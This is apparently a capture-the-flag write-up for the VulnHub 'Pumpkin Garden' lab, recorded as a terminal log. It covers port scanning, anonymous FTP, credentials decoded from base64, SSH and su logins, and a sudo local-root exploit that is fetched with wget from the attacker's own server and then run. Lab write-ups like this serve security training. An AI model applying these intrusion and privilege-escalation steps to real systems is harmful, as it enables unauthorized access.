NOTES ABOUT Pumpkin Garden
[ 2022-09-27 ] [ VulnHub / Pumpkin Garden ]Status: Rooted
Skills: Port Scanning, FTP, SSH, Sudo Exploit
Tools: nmap
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.6
[...]
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 88 Jun 13 2019 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.0.2.15
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
1515/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Mission-Pumpkin
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
3535/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
[...]
GETTING IN
$ ftp anonymous@10.0.2.8
Connected to 10.0.2.8.
220 Welcome to Pumpkin\'s FTP service.
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||59974|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 88 Jun 13 2019 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||53517|).
150 Opening BINARY mode data connection for note.txt (88 bytes).
100% |*************************************************************************************************************************| 88 1.35 MiB/s 00:00 ETA
226 Transfer complete.
88 bytes received in 00:00 (107.42 KiB/s)
ftp> quit
221 Goodbye.
$ cat note.txt
Hello Dear!
Looking for route map to PumpkinGarden? I think jack can help you find it.
$ curl http://10.0.2.8:1515/
<html>
<head>
<title>Mission-Pumpkin</title>
<link rel="icon" href="img/favicon.ico" type="image/gif" sizes="16x16">
<style>
body {
background-color: #FCF0E4;
}
.center {
display: block;
margin-left: auto;
margin-right: auto;
width: 30%;
}
</style>
</head>
<body>
<img src= "img/pumpkin.gif" class="center" />
<center>
<p style="font-family: verdana; font-size: 120%;">
My dear friend, I <span style="font-size:100%;color:red;">♥</span>
to sit on a pumpkin and have it all to myself,</br>
rather than sitting with a crowd on a velvet cushion. So, it is better you get one for yourself.</br></br>
<!-- searching for the route map? Pumpkin images may help you find the way -->
Please Don't disturb me... </br></br></br>
I can't help you in getting your pumpkin.</br>But, I found the route map to <b><i>PumpkinGarden</i></b> somewhere under the hood.
</p>
</center>
</body>
</html>
$ curl -L http://10.0.2.8:1515/img/hidden_secret/clue.txt
c2NhcmVjcm93IDogNVFuQCR5
$ echo "c2NhcmVjcm93IDogNVFuQCR5" | base64 -d
scarecrow : 5Qn@$y
$ ssh scarecrow@10.0.2.8 -p 3535
The authenticity of host '[10.0.2.8]:3535 ([10.0.2.8]:3535)' can't be established.
ED25519 key fingerprint is SHA256:mLTE3ZDFS+c1wgTIsHLdH7jtZFKpYoPljQRHRdH7IVo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.0.2.8]:3535' (ED25519) to the list of known hosts.
------------------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
scarecrow@10.0.2.8's password: 5Qn@$y
Last login: Thu Jun 13 00:35:51 2019 from 192.168.1.106
scarecrow@Pumpkin:~$ ls
note.txt
scarecrow@Pumpkin:~$ cat note.txt
Oops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)!
Reach out to goblin and share this "Y0n$M4sy3D1t" to secretly get keys from LordPumpkin.
scarecrow@Pumpkin:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
[...]
jack:x:1000:1000:jack,,,:/home/jack:/bin/bash
scarecrow:x:1001:1001:Scarecrow,,,:/home/scarecrow:/bin/bash
goblin:x:1002:1002:Goblin,,,:/home/goblin:/bin/bash
scarecrow@Pumpkin:~$ su goblin
Password: Y0n$M4sy3D1t
goblin@Pumpkin:/home/scarecrow$
goblin@Pumpkin:/$ cd /home/goblin/
goblin@Pumpkin:~$ ls
note
goblin@Pumpkin:~$ cat note
Hello Friend! I heard that you are looking for PumpkinGarden key.
But Key to the garden will be with LordPumpkin(ROOT user), don't worry, I know where LordPumpkin had placed the Key.
You can reach there through my backyard.
Here is the key to my backyard
https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh
ELEVATING PRIVILEGES
PREPEARING EXPLOIT
$ searchsploit -m 11651
$ python3 -m http.server
GETTING EXPLOIT
goblin@Pumpkin:~$ wget 10.0.2.15:8000/11651.sh
goblin@Pumpkin:~$ chmod +x 11651.sh
goblin@Pumpkin:~$ ./11651.sh 1
Tod Miller Sudo local root exploit
by Slouching
automated by kingcope
ALEX-ALEX
root@Pumpkin:/tmp#
root@Pumpkin:/tmp# cd /root/
root@Pumpkin:~# ls
PumpkinGarden_Key
root@Pumpkin:~# cat PumpkinGarden_Key
Q29uZ3JhdHVsYXRpb25zIQ==
root@Pumpkin:~# cat PumpkinGarden_Key | base64 -d
Congratulations!
HURRY UP!
root@Pumpkin:/tmp# crontab -l
[...]
* * * * * rm /home/goblin/*.*
* * * * * sleep 15; rm /home/goblin/*.*
* * * * * sleep 30; rm /home/goblin/*.*
* * * * * rm /tmp/*
* * * * * sleep 15; rm /tmp/*
* * * * * sleep 30; rm /tmp/*